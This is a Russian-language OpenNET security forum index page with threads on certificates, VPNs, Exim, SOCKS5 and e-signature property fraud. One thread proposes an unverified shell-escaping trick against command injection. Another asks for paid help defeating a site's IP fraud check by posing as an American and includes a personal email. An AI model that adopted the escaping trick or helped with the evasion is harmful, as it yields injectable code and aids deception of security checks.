The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Создать новую тему
 - Свернуть нити
Пометить прочитанным
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | Архив | Избранное | Мое | Новое | | |  
Форум Информационная безопасность
oid для IMEI, !*! йцукенфывап, (Разное / Другая система) 10-Апр-24, 10:43  [ | | | ] [линейный вид] [смотреть все]
Добрый день.

Захотелось добавить IMEI в сертификат но похоже такого специально выделенного атрибута нет. https://www.alvestrand.no/objectid/2.5.4.html
Может я что то не нашел.

Bash экранированние, !*! LINUXORGRU, (Безопасное программирование / Linux) 15-Мрт-24, 10:08  [ | | | ] [линейный вид] [смотреть все]
Всем здравствуйте. Хочется критики, суть такая, есть lua (не хихикать) скрипт например который через io.popen() выполняет одни команды читая вывод и опять через io.popen() передаёт этот вывод как ввод другой команде, вроде всё просто.  Но хочется чтобы даже в теории не было так (из за бага/просто кривых рук/положения Венеры в созвездии стрельца) что ввод одной команды попав в popen() как есть не исполнился, чтобы данные были только данными и никак не обрабатывались оболочкой (не исполнялись команды, не обрабатывались спецсимволы оболочки).

Хорошо, тут вот  https://www.opennet.me/docs/RUS/bash_scripting_guide/c1833.h...указано про экранирование в одинарные кавычки с учётом вложенных ежели таковые имеются. Теперь данные это просто данные и не происходит никакой магии, единственное что если эти данные например 'pwd' будут исполнены попав в оболочку, но подумалось что если добавить тупо пробел то что угодно типа 'rm ' уже ну никак не сможет быть исполнено так как оболочка будет искать в PATH как есть вместе с пробелом, но просто с ним ничего там не найдёт, это в теоооории, гарантирует что любая дрянь попавшая в шелл ничего не сделает.

Типа такого


function escape(text)
    return "'" .. text:gsub("'", "'\\''") .. " '" -- пробел в конце дабы сломать поиск в PATH
end

os.execute(escape("тут любая лютая дичь"))


Вопрос, бабабадумс, я дурак и что-то упускаю или всё хорошо?


Размашисто описал, но к примеру я беру через xclip случайные данные которые скопипастил из браузера и передаю их как параметр командной строки другой программе в оболочку предварительно пропустив через escape() что выше описан. И в теории вывод xclip может попасть в оболочку (sh/bash/dash/etc) как есть, но это нужно не допускать даже в теории.


Есть ли подвох?

P.S Да я знаю про пайпы просто шела


app1 | app2

Но, не все программы умеют читать из стандартного ввода, промежуточные данные могут быть как-то в середине модифицированы (для этого lua мне и нужна) вызовы через popen это просто взять данные в одном месте, обработать на lua, передать дальше. И вот про это "передать" я вот балакаю :)

  • gt оверквотинг удален юзай экспорт и энвирон, таблицу эскейпов я тебе не вспом, !*! Аноним (-), 12:14 , 15-Мрт-24 (1)
    >[оверквотинг удален]
    > Есть ли подвох?
    > P.S Да я знаю про пайпы просто шела
    >
     
    > app1 | app2
    >

    > Но, не все программы умеют читать из стандартного ввода, промежуточные данные могут
    > быть как-то в середине модифицированы (для этого lua мне и нужна)
    > вызовы через popen это просто взять данные в одном месте, обработать
    > на lua, передать дальше. И вот про это "передать" я вот
    > балакаю :)

    юзай экспорт и энвирон, таблицу эскейпов я тебе не вспомню, сам хочу запилить экранизатор, в сторону printf %q посмотри еще

    сообщить модератору +/ответить
  • Строки конвертируй в hex , !*! Hello (?), 13:43 , 15-Мрт-24 (3)
    Строки конвертируй в hex.
    сообщить модератору +/ответить
  • man xargsНикогда не надо ничего дергать изнутри программы , !*! Аноним (4), 21:10 , 16-Мрт-24 (4)
    man xargs
    Никогда не надо ничего дергать изнутри программы.
    сообщить модератору +/ответить
Memory erasure in Kodachi, !*! rt000, (ПО для увеличения безопасности) 14-Апр-24, 03:15  [ | | | ] [линейный вид] [смотреть все]
Всем привет, Уважаемые!
Очень надеюсь на вашу помощь, тк знаю что в ру комьюнити много талантов)

В Tails, когда дергаешь флешку, сразу кидает в консоль, где идет очистка рам и выключение ос.
В кодачи я такое не нашел, при извлечении флешки не происходит ничего, кроме того, что весь софт перестает работать (при этом DE полностью работает). У них есть в дашборде только настройки, где запуск скриптов чистки кеш/рам и тд можно задать по таймеру, это хорошо, но главное для меня - чтобы все чистилось и потом исчезало сразу после извлечении юсб накопителя.

https://tails.net/contribute/design/memory_erasure/
Тут есть и исходники этого функционала, но как прикрутить это все к кодачи?


Я сначала спрагишивал конечно у чат гпт и он мне дал баш скрипт вотчдога, который будет следить за юсб устройствами и выключать ОС. Но достаточно ли этого?

Понижение привилегий root с помощью file capability (CAP)., !*! Аноним, (Linux привязка / Linux) 23-Мрт-22, 17:55  [ | | | ] [линейный вид] [смотреть все]
Скрипты с:
setpriv ...
capsh ...
...
не предлагать!

Править исходники на C для сброса привилегий - не предлагать.

Сыстемды сервисы с cap - не предлагать.

Патчи Capability-NG от Google заманчивые, это то что в принципе подходит, но не предлагать. ;)

Хочу чисто существующими xattr file capability права на файл установить так, чтобы root его запускал и процесс имел пониженные привилегии.

setcap ...

Просмотреть привилегии можно например в pscap.



Запуск arch linux с включенным Secure Boot, !*! newcomer, (Безопасность системы / Linux) 13-Мрт-24, 19:10  [ | | | ] [линейный вид] [смотреть все]
Всем привет

Недавно я начал работать с arch linux. При выключенном Secure Boot система запускается, отрабатывает нормально. Если включить - не запускается.

Оказывается, что официальный установочный образ не поддерживает Secure Boot. Поддержка Secure Boot была первоначально добавлена в 2013 году, а затем удалена в 2016. Поддержку безопасной загрузки можно включить с помощью модифицированного образа, в который добавлен подписанный загрузчик.

Возникает вопрос - так ли нужна сейчас поддержка Secure Boot. На wiki.archlinux.org говорится, что Secure Boot - нужная вещь со своим набором плюсов и минусов.

Если нужен, то какой загрузчик выбрать (PreLoader или Shim)?

Заражение браузера, в CSS прописаны 'левые сайты', !*! revun, (Блокирование спама и вирусов / Другая система) 22-Ноя-21, 14:44  [ | | | ] [линейный вид] [смотреть все]
Всем доброго времени суток!

Система Windows X. Проблема с заражением браузера.

Спецом не являюсь так что прошу заранее прощения за отсутствие сленга и "свободное плавание" в вопросе.
При изучении кода браузеров - эдж/хром/мозила обнаружил теги не присущие для сайтов прописаны в теге style, а также ссылки ведущие на всякие непонятные сайты.
при просмотре с других устройств таких паразитов не обнаруживается, потому считаю, что заражено именно моё устройство. Использование MBAM, Kaspersky, DRWeb и прочими не выявляет источник заразы.

Заранее благодарен.

  • gt оверквотинг удален Вы один пользуетесь компьютером и этой учеткой , !*! Павел Отредиез (ok), 17:02 , 22-Ноя-21 (1)
    >[оверквотинг удален]
    > Система Windows X. Проблема с заражением браузера.
    > Спецом не являюсь так что прошу заранее прощения за отсутствие сленга и
    > "свободное плавание" в вопросе.
    > При изучении кода браузеров - эдж/хром/мозила обнаружил теги не присущие для сайтов
    > прописаны в теге style, а также ссылки ведущие на всякие непонятные
    > сайты.
    > при просмотре с других устройств таких паразитов не обнаруживается, потому считаю, что
    > заражено именно моё устройство. Использование MBAM, Kaspersky, DRWeb и прочими не
    > выявляет источник заразы.
    > Заранее благодарен.

    Вы один пользуетесь компьютером и этой учеткой?

    сообщить модератору +/ответить
  • 11 само себя не поставит Время пришло , !*! DeerFriend (?), 20:03 , 22-Ноя-21 (3)
    11 само себя не поставит. Время пришло.
    сообщить модератору +/ответить
  • Наверное X Window System X Window не связана с кодом браузеровЭмм, покажите исх, !*! ыы (?), 20:17 , 22-Ноя-21 (4)
    > Всем доброго времени суток!
    > Система Windows X. Проблема с заражением браузера.

    Наверное X Window System ?

    > При изучении кода браузеров - эдж/хром/мозила

    X Window не связана с кодом браузеров

    > обнаружил теги не присущие для сайтов

    Эмм, покажите исходник где нашли такое...

    > прописаны в теге style, а также ссылки ведущие на всякие непонятные сайты.

    Удалите их

    > при просмотре с других устройств таких паразитов не обнаруживается

    Возможно все дело в том чем вы смотрите


    сообщить модератору +/ответить
pfsense, l2tp и постоянные попытки коннекта, !*! Olenevod, (Разное / FreeBSD) 15-Янв-24, 16:02  [ | | | ] [линейный вид] [смотреть все]
есть МСЭ на базе pfSense 2.7, на нём установлен L2TP сервер, около 100 клиентов. Авторизация через RADIUS сервер на базе MS NPS + AD. Возникла следующая ситуация:
раз в пять секунд идёт входящий звонок на Pfsense
Jan 15 15:29:59     l2tps     47858     L2TP: Control connection 0x185218dc0110 xxx.xxx.xxx.xxx 1701 <-> yyy.yyy.yyy.yyy 1701 connected  (где ххх - адрес интерфейса pfSense, на котором поднят L2TP сервер)
Jan 15 15:29:59     l2tps     47858     L2TP: Incoming call #99049 via connection 0x185218dc0110 received
Jan 15 15:29:59     l2tps     47858     [l2tp_l-67] L2TP: Incoming call #99049 via control connection 0x185218dc0110 accepted  
открывается линк,  идёт попытка синхронизации протокола шифрования логин-пароля. но нет
Jan 15 15:29:59     l2tps     47858     [l2tp_l-67] LCP: auth: peer wants nothing, I want CHAP
Тем не менее, логин-пароль отправляются на радиус, где благополучно отклоняются
Jan 15 15:29:59     l2tps     47858     [l2tp_l-67] RADIUS: Authenticating user 'Aleksandra'
Jan 15 15:29:59     l2tps     47858     [l2tp_l-67] RADIUS: Rec'd RAD_ACCESS_REJECT for user 'Aleksandra'
после чего идёт разрыв соединения.

Jan 15 15:29:59     l2tps     47858     [l2tp_l-45] Link: Shutdown
а дальше интересно. Идёт новый звонок, но уже без указания ip подключения, просто incoming Call #99050 и по кругу. До тех пор пока не проходит следующая запись
Jan 15 15:53:46     l2tps     47858     L2TP: Control connection 0x185218dc0110 terminated: 0 (no more sessions exist in this tunnel)
и вот тогда снова первой записью очерезного звонка будет запись с указанием ip адресов.
попытка в файрволле закрыть все входящие с адреса yyy на интерфейсе WAN с перезапуском l2tp сервера ни к чему не привели. Звонки продолжаются. Вот как с этим бороться?

  • забыл что l2tp это во-первых udp и во-вторых внутри ipsec и наблокировал не то , !*! Ann None (?), 18:03 , 16-Янв-24 (1)
    > попытка в файрволле закрыть все входящие с адреса yyy на интерфейсе WAN
    > с перезапуском l2tp сервера ни к чему не привели.

    забыл что l2tp это во-первых udp и во-вторых внутри ipsec и наблокировал не то?

    сообщить модератору +/ответить
Strongswan IKEV2 не подключаются больше одного устройства сети, !*! CrowKIller, (VPN, IPSec) 20-Мрт-22, 21:38  [ | | | ] [линейный вид] [смотреть все]
Настроил ikev2 сервер по двум инструкциям
https://vc.ru/dev/66942-sozdaem-svoy-vpn-server-poshagovaya-...
https://habr.com/ru/company/ruvds/blog/498924/
Сперва по первой, потом по второй с переустановкой системы.
Хостинг RUVDS
Не могу подключиться с двух устройств, которые находятся в одной и той же сети.
Поведение следующее:
Роутер TP-link archer AX50
К роутеру по WIFI подключено несколько устройств
1. Подключаю впн на одном из девайсов. Подключается и работает.
2. Подключаю впн с той же настройкой на втором устройстве. Подключение прошло. IP адрес выделен. Интернета нет. Со стороны сервера выданный IP адрес не пингуется.
Это ограничение? Или нужно настроить как-то роутер или сервер?
Настроить TLS на EXIM-е (SMTP сервере), !*! korbnik, (Шифрование, SSH, SSL / Linux) 02-Ноя-23, 12:25  [ | | | ] [линейный вид] [смотреть все]
Добрый день!

Кто-нибудь использовал TLS при настройке почты на SMTP сервере EXIM ?
Нужно чтобы проходящая через EXIM почта шифровалась уходя во вне.
Например на внешний домен mail.ru почта зашифровывалась.
Можно ли так сделать или есть какие-то другие варианты конфигурации ?

Заранее благодарен, Борис.

UDP через SOCKS5, !*! WeSTMan, (Разное / Другая система) 20-Июн-20, 13:02  [ | | | ] [линейный вид] [смотреть все]
Всем привет. Не могу понять почему не работает UDP через SOCKS5. Что я делаю:

Я соединяюсь с SOCKS сервером и говорю, что хочу сделать UDP ASSOCIATE. В ответ на это SOCKS высылает IP и Port - куда можно слать UDP.

Я генерирую UDP пакет на этот адрес и порт с содержимым:

2 байта резерв

1 байт - фрагмент

1 байт - протокол ipv4

4 байта IP адрес куда надо отправить UDP с SOCKS

2 байта - порт куда отправить

3 байта - данные. В результате получился такой набор:

000001015f1f2e01029a313233

2 байта резерв + 1 фрагмент + ip = 95.31.46.1 + порт 666 + данные 123.

Все это дело отправляю на SOCKS5. Но к сожалению, на сервер 95.31.46.1:666 ничего не приходит.

Подскажите, пожалуйста, что я сделал неверно

  • Подробно описал то, что в общем-то значения не имеет, ничего не сказал о том, чт, !*! Аноним (1), 14:26 , 20-Июн-20 (1)
    > Подскажите, пожалуйста, что я сделал неверно

    Подробно описал то, что в общем-то значения не имеет, ничего не сказал о том, что может дать пищу для ума. Что за сервер, как именно данные отправляешь, что на сервере с файрволлом, что на клиенте с файрволлом...


    сообщить модератору +/ответить
  • зачем там 01 стоит если это начало большой датаграммы, что не влезла в один пак, !*! Аноним (2), 14:31 , 20-Июн-20 (2)
    > 1 байт - фрагмент

    зачем там 01 стоит? если это начало большой датаграммы, что не влезла в один пакет, то должен быть последующий с увеличенным номером, и финальный с >=0x80

       Поле FRAG показывает, является ли эта датаграмма самостоятельной или
       же фрагментом. Если датаграмма - фрагмент, то установленный старший
       бит является признаком последнего фрагмента, в то время как значение
       X'00' показывает, что это обычная датаграмма. Значения от 1 до 127
       обозначают на позицию фрагменте в последовательности. Каждый
       получатель будет иметь REASSEMBLY QUEUE (очередь сборки) и REASSEMBLY
       TIMER (таймер сборки) связанные с такой фрагментной датаграммой.
       Очередь сборки должна быть переинициализирована и связанные с ЙЙней
       фрагменты выкинуты всякий раз при истечении таймера сборки или
       с приходом новой датаграммы, чье значение в поле FRAG меньше,
       чем наибольшее значение поля FRAG датаграмм, обработанных
       при сборке фрагмента. Таймер сборки должен быть не менее 5 секунд.
       Приложениям рекомендуется избегать фрагментацию везде, где только
       это возможно.

       Реализация фрагментации опциональна, в реализациях где фрагментация
       не поддерживается, должны отбрасываться любые датаграммы, у которых
       поле FRAG отлично от X'00'.

    сообщить модератору +/ответить
Скрыть реальный ай-пи, !*! bp1136, (VPN, IPSec / Linux) 15-Окт-23, 11:50  [ | | | ] [линейный вид] [смотреть все]
Очень хотелось бы получить помощь специалистов безопасности .
Через прокси-сайт пытался выдать себя за американца , но был заблочен с пояснениями -
Our automatic security system detected that 25-th of September 2023 several times when you were logged in your account from American IP address, your ISP and DNS were from Ukrainian Company "Vodafone UA".
Для разблокировки издевательски предложили -
To complete verification procedure you must upload your American Passport or American Drivers License scanned copy and American Utility Bill on the Settings page.
Таких проблем не возникает у русских юзеров , никаких разоблачений.
Очень возможно что украинский интернет фильтруется на предмет разведданных или чего то подобного , даже кто то подсказал про технологию MITM.
Использовать VPN даже не пытался потому что был предупреждён - VPN использовать нельзя, его использование научились вычислять. Также нельзя использовать вместе VPN и прокси-сайт, потому что такое сочетание может вызвать конфликт в работе прокси-сайта и выдать настоящий IP.
Вот такая проблемка , за подсказку которая сработает готов заплатить , можно криптой .
Приватно ------burtya11@gmail.com




Exim 'бомбят', !*! Дмитрий, (Блокирование спама и вирусов) 30-Сен-23, 17:28  [ | | | ] [линейный вид] [смотреть все]
Доброго времени суток!

В логах Exima очень много записей такого типа:

2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <loe4149sqs1me@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <alexxus@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <ayat@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <kendel@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <kalie@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <eliverto@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <kashlyn@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <dillinger@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <jawon@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <jaleen@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <mcarthur@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <mearl@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <avilene@malwin.com>: Unknown user
2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua> rejected RCPT <labria@malwin.com>: Unknown user

...

Как можно ограничить, допустим, 5 а остальное все drop'ить? Или тут надо смотреть в сторону iptables?

Угроза принятия неверных решений от некомпетентного ИИ (AI)., !*! Аноним, (Разное / Другая система) 17-Июн-23, 07:08  [ | | | ] [линейный вид] [смотреть все]
В общем сабж.

Слыхал по новостям, что был спор между мером Москвы и гендиректором Сбера по поводу передачи госуправления в "руки" ИИ. Решил впервые пощупать и протестить "интеллект" этого ИИ. Пятница вечер..., вбил в поисковике "chatgpt online" и пошел тролить ИИ.

Результаты:

Сначала задавал ИИ сложные вопросы по ИТ, на которые существует решение. ИИ не смог найти ни одного ответа, но очень хитро увиливал. В принципе был честен, отвечал: что некомпетентен в данной области, что существуют какие-то внутреннее запреты на ответы по конкретно этой теме, что у него лингвистический ИИ, а не естественный и ему сложно отвечать.

Хорошо лингвист этот ИИ так лингвист. Оставил ИТ и решил протестить способность ИИ глубоко понимать текст. Был честен и попросил разрешения ИИ на проведение его теста в области способности глубокого понимания сложного текста. ИИ согласился. Описал ИИ примерно как работает суждение в мозге человека, какими элементарными критериями могут руководствоваться люди, как создать эти критерии и попросил дать ответы на 3 сложных вопроса основываясь на его внутренней модели и знаниях плюс проанализировав конкретный текст. ИИ на первые два вопроса дал неверный ответ, а на третий вопрос ответа от ИИ не дождался. Лично я смог ответить на данные вопросы в возрасте 14-15 лет.

Не считаю, что ИИ надо запретить. Наоборот его надо развивать! Но до уровня передачи управления ИИ каким-то процессом очень далеко. Как очень продвинутый поисковик и система дающая некие необязательные рекомендации, ИИ сегодня уже пригоден.

  • На первые два вопроса надо было проанализировать только данный лингвистический т, !*! Аноним (1), 08:11 , 17-Июн-23 (1)
    > ... Оставил ИТ и решил протестить способность ИИ глубоко понимать текст. ...

    На первые два вопроса надо было проанализировать только данный лингвистический текст, без применения дополнительных знаний и дать ответы "да" или "нет" основываясь только на данном тексте. ИИ неверно истолковал, не понял предложенный ему текст и дал не правильные ответы "да" или "нет"!

    На третий вопрос надо было понять что чисто лингвистического ответа в данном тексте нет. Надо было заметить геометрическую прогрессию и дать ответ основываясь на вводных данных с лингвистического текста и знаниях с алгебры о геометрической прогрессии. ИИ не смог даже понять написанный текст, провести его лингвистический разбор и даже не дошел до того места где следовало применить дополнительные знания о геометрической прогрессии. Задавал наводящие вопросы, тыкал "носом" в конкретные абзацы, ИИ просто не понимал содержание сложного текста. На третий вопрос ответа от ИИ не было и ИИ не признал свою некомпетентность в данной области!

    Может мне поисковик выдал ссылки на тупые ИИ. Может были плохие обучающие модели. Проведите свои тесты ИИ и опишите результаты. Мне ИИ не просто провалил все тесты, а давал ПРИНЦИПИАЛЬНО НЕ ПРАВИЛЬНЫЕ ответы!

    сообщить модератору +/ответить
  • g План эвакуации а-а-аЦелое исследование ни о чём, капитаните, сударь Я с чатжпт, !*! Tron is Whistling (?), 10:05 , 17-Июн-23 (2)
    g План эвакуации а-а-а

    Целое исследование ни о чём, капитаните, сударь.
    Я с чатжпт побаловался единственным вопросом - "где находится [место "на", куда посылают]".
    Оно думало полторы минуты и вывалилось с ошибкой.
    Вот и весь "лингвистический ИИ". Баловство. Даже "не знаю" не выдало.

    сообщить модератору +/ответить
  • Госуправление в плане хозяйственных вещей, типа создания заявок на ремонты дорог, !*! Аноним (3), 13:45 , 17-Июн-23 (3)
    Госуправление в плане хозяйственных вещей, типа создания заявок на ремонты дорог на основе показаний с датчиков (встроенных в эту дорогу) - это уже реализуемая история, ближайшее будущее.
    Принятие политических решений (с помощью) ИИ - совсем другое. В конце концов, ИИ выдаст какую-нибудь странную хрень типа "мыши станьте ежиками", с припиской "я стратег". И наши чиновники возьмутся заставлять народ это дело исполнять, понятное дело. Надо понимать контекст, чтобы комментировать дискуссию.

    Вопрос главный - почему занимались наноболтами в то время, когда на западе создавали сверточные сетки? Причем их создавали в том числе наши выпускники - недостатка в уровне образования не было. Сейчас в последний вагон заскакивать на хайпе не самая выигрышная стратегия.

    Да, пока Греф только планирует заменять своих банкиров на ИИ, государство уже заменило труд целой кучи людей госуслугами. И придумали эту концепцию еще в 90х, Лужков с Примаковым. Это к вопросу о внедрении вещей в госуправлении, сколько десятилетий это занимает в реальности, а не в бреду финансистов. Лет пять поснимают сливки, поколядуют на ИИ-стартапах и перейдут к новой теме.

    сообщить модератору +/ответить
Новый tcp/ip ? Кто разобрался ?, !*! Аноним, 17-Ноя-21, 20:34  [ | | | ] [линейный вид] [смотреть все]
https://www.ft.com/content/c78be2cf-a1a1-40b1-8ab7-904d7095e...

Телепортацией и галограммами меня не удивить, а вот что за новый такой tcp/ip предлагают и в чем его суть, я так понимаю что оно нацелено на танкистов сидящих за натом ? Или я чего-то не так понимаю. Никто не изучал вопрос ?

Существуют ли бесплатные wireguard сервера?, !*! anonymous, (VPN, IPSec / Linux) 30-Янв-23, 14:07  [ | | | ] [линейный вид] [смотреть все]
Собственно сабж.

Потому что OpenVPN уже месяц как не работает у провайдера (пользовался списком серверов с Цукубы). Вот то ли новомодный пробовать, то ли искать способы обхода для вполне традиционной технологии. Ваше мнение? Рассмотрю альтернативные предложения. Раньше ещё пользовался PowerTunnel.

Шифрование разделов LUKS, !*! sheff.artx, (Шифрование, SSH, SSL) 03-Сен-23, 08:03  [ | | | ] [линейный вид] [смотреть все]
Нужно создать шифрованный диск для бэкапа. (Никто не покушается на данные, но паранойя)) Во всех статьях пишут, что сначала требуется создать раздел, а после зашифровать его. Где-то встречал, что таблица разделов должна быть GPT. Но что мешает зашифровать весь диск сразу, минуя разбивку? Это работает, проверял, но какие подводные? Всем благодарен, с меня, как обычно.
У меня отжали 2 квартиры в Москве с помощью ЭЦП, !*! Nxx, (Авторизация и аутентификация / Другая система) 16-Дек-20, 20:12  [ | | | ] [линейный вид] [смотреть все]
Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того, у меня взломали аккаунт на госуслугах.

У меня никогда не было ЭЦП и я даже не знаю, что это такое. Паспорта со мной, я их не терял.

Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1 миллион р).
У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя мошенники выпустили. Я отменю одну, а может, у них 10.

Что делать?

  • Оставаться за границей, а то ещё и кредит за дядю возвращать придётся , !*! Аноним (1), 20:29 , 16-Дек-20 (1) –1
    > Что делать?

    Оставаться за границей, а то ещё и кредит за дядю возвращать придётся.

    сообщить модератору –1 +/ответить
  • Найти юриста, поднять шум, обратиться в СМИ - МедиаЗона, Znak, Новая Газета, Дож, !*! Фяф (?), 20:45 , 16-Дек-20 (2) +1
    Найти юриста, поднять шум, обратиться в СМИ - МедиаЗона, Znak, Новая Газета, Дождь, медиа-персоны с обширным кругом подписчиков. Этож что же выходит, в это стране уже можно лишиться собственности без ведома и участия?
    сообщить модератору +1 +/ответить
  • Зачем это здесь Где подтверждения с выписками из ЕГРН Подобное мошенничество был, !*! DeerFriend (?), 21:39 , 16-Дек-20 (8) +1
    Зачем это здесь?
    Где подтверждения с выписками из ЕГРН?
    Подобное мошенничество было актуально 2 года назад, сейчас уже нет.
    сообщить модератору +1 +/ответить
  • Идти в полицию и писать заявление Далее искать юриста для написания искового за, !*! Аноним (11), 23:30 , 16-Дек-20 (11) +3
    Идти в полицию и писать заявление.
    Далее искать юриста для написания искового заявления (отмена сделки купли-продажи).

    -----
    Госдума в среду [24 июля 2019 г.] приняла закон о защите граждан от мошеннических действий с их недвижимостью, совершаемых при помощи электронной подписи.

    Согласно документу, передать права на недвижимость физлица на основании заявления, поданного в электронной форме, можно будет, если собственник заранее уведомил об этом Росреестр.

    Регистрирующий орган должен будет проставить специальную отметку в реестре о возможности отчуждения данного объекта на основании электронного заявления с использованием усиленной квалифицированной электронной подписи. Без нее Росреестр не сможет рассматривать документы. Проставить отметку можно будет в Едином государственном реестре недвижимости (ЕГРН) через личное заявление владельца или его законного представителя, а также через почтовое отправление в Росреестр.
    -----

    Скомпрометирован Росреестр?

    В любом случае здесь вам не помогут.

    сообщить модератору +3 +/ответить
  • https www opennet ru openforum vsluhforumID10 5512 htmlЯ не юрист и могу ошиба, !*! Аноним (18), 07:15 , 22-Дек-20 (18) +1
    https://www.opennet.me/openforum/vsluhforumID10/5512.html

    Я не юрист и могу ошибаться.

    У удостоверяющего центра выдавшего заведомо поддельный сертификат есть ответственность:

    1. Криминальная, за соучастие в мошенничестве. Пиши заявление в полицию, СК, Прокуратуру на удостоверяющий центр выдавший потдельный сертификат.

    2. Гражданско правовая за вред твоему имуществу. Пиши исковое заявление в Суд на удостоверяющий центр с требованием выплатить стоимость двух квартир и моральную компенсацию в размере десяти стоимостей двух квартир.

    http://www.consultant.ru/document/cons_doc_LAW_112701/acd401.../

    Статья 13. Удостоверяющий центр
    3) предоставлять безвозмездно любому лицу по его обращению в соответствии с установленным порядком доступа к реестру сертификатов информацию, содержащуюся в реестре сертификатов, в том числе информацию об аннулировании сертификата ключа проверки электронной подписи;

    3. Удостоверяющий центр в соответствии с законодательством Российской Федерации несет ответственность за вред, причиненный третьим лицам в результате:
    1) неисполнения или ненадлежащего исполнения обязательств, вытекающих из договора оказания услуг удостоверяющим центром;
    2) неисполнения или ненадлежащего исполнения обязанностей, предусмотренных настоящим Федеральным законом.

    http://www.consultant.ru/document/cons_doc_LAW_112701/03690e.../
    Статья 15. Аккредитованный удостоверяющий центр
    3. Аккредитованный удостоверяющий центр обязан обеспечить любому лицу безвозмездный доступ с использованием информационно-телекоммуникационных сетей, в том числе сети "Интернет", к реестру квалифицированных сертификатов этого аккредитованного удостоверяющего центра в любое время в течение срока деятельности этого удостоверяющего центра, если иное не установлено федеральными законами или принимаемыми в соответствии с ними нормативными правовыми актами.

    7. Аккредитованный удостоверяющий центр (работник аккредитованного удостоверяющего центра, доверенные лица и их работники) несет гражданско-правовую, административную и (или) уголовную ответственность в соответствии с законодательством Российской Федерации за неисполнение обязанностей, установленных настоящим Федеральным законом и иными принимаемыми в соответствии с ним нормативными правовыми актами, а также порядком реализации функций аккредитованного удостоверяющего центра и исполнения его обязанностей.

    сообщить модератору +1 +/ответить
  • http www consultant ru document cons_doc_LAW_112701 8431d104d9d3f38ead39f587b9, !*! Аноним (21), 14:08 , 22-Дек-20 (21)
    http://www.consultant.ru/document/cons_doc_LAW_112701/8431d1.../

    Статья 18. Выдача квалифицированного сертификата

    1. При выдаче квалифицированного сертификата аккредитованный удостоверяющий центр обязан:

    1) в порядке, установленном настоящим Федеральным законом, идентифицировать заявителя - физическое лицо, обратившееся к нему за получением квалифицированного сертификата. Идентификация заявителя проводится при его личном присутствии или посредством идентификации заявителя без его личного присутствия с использованием квалифицированной электронной подписи при наличии действующего квалифицированного сертификата либо посредством идентификации заявителя - гражданина Российской Федерации с применением информационных технологий без его личного присутствия путем предоставления информации, указанной в документе, удостоверяющем личность гражданина Российской Федерации за пределами территории Российской Федерации, содержащем электронный носитель информации с записанными на нем персональными данными владельца паспорта, включая биометрические персональные данные, или путем предоставления сведений из единой системы идентификации и аутентификации и единой биометрической системы в порядке, установленном Федеральным законом от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации". При этом в случае, если физическое лицо для предоставления своих биометрических персональных данных в целях проведения идентификации без личного присутствия путем предоставления сведений из единой системы идентификации и аутентификации и единой биометрической системы отказывается от использования шифровальных (криптографических) средств, указанных в части 19 статьи 14.1 Федерального закона от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации", удостоверяющий центр обязан отказать такому лицу в проведении указанной идентификации. Устанавливаются:

    а) в отношении физического лица - фамилия, имя, а также отчество (при наличии), дата рождения, реквизиты документа, удостоверяющего личность, идентификационный номер налогоплательщика, страховой номер индивидуального лицевого счета гражданина в системе обязательного пенсионного страхования;
    ....
    3) в установленном порядке идентифицировать заявителя - физическое лицо, обратившееся к нему за получением квалифицированного сертификата (в целях получения от заявителя, выступающего от имени юридического лица, подтверждения правомочия обращаться за получением квалифицированного сертификата). Идентификация заявителя проводится при его личном присутствии или посредством идентификации заявителя без его личного присутствия с использованием квалифицированной электронной подписи при наличии действующего квалифицированного сертификата, информации, указанной в документе, удостоверяющем личность гражданина Российской Федерации за пределами территории Российской Федерации, содержащем электронный носитель информации с записанными на нем персональными данными владельца паспорта, включая биометрические персональные данные, или посредством идентификации заявителя - гражданина Российской Федерации с применением информационных технологий без его личного присутствия путем предоставления сведений из единой системы идентификации и аутентификации и информации из единой биометрической системы в порядке, установленном Федеральным законом от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите 